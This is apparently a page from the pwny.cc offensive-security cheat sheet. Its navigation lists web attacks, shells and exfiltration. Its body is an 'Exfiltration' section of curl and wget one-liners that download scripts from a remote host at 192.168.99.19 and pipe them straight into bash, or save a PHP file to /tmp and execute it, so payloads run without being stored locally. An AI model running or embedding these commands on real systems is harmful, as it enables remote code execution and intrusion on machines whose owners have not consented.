pwny.cc
Search…
Home
WEB ATTACKS
Misc
OAuth
Open Redirect
Command Injection
Local File Inclusion (LFI)
Insecure File Upload
Insecure Direct Object Reference (IDOR)
SQL Injection (SQLi)
Cross-Site Scripting (XSS)
Server Side Request Forgery (SSRF)
Server Side Template Injection (SSTI)
XML External Entity (XXE)
SHELLS
Misc
Web Shells
Reverse Shells
Obfuscated Shells
SO
Linux
Internal Recon
Bypasses
Network
Exfiltration
Containers
Iptables
Windows
OTHER
Sandbox Escape
Cracking
Powered By
GitBook
Exfiltration
Execute code without download files locally
1
#Curl
2
curl
-fsSL http://192.168.99.19:8080/test.sh
|
bash
3
bash
<
<
(
curl
http://192.168.99.19:8080/test.sh
)
4
5
#Wget
6
wget
-q -O- http://192.168.99.19:8080/test.sh
|
bash
7
wget
http://192.168.99.19:8080/shell.txt -O /tmp/x.php
&&
php /tmp/x.php
Copied!
Previous
Network
Next
Containers
Last modified
8mo ago
Copy link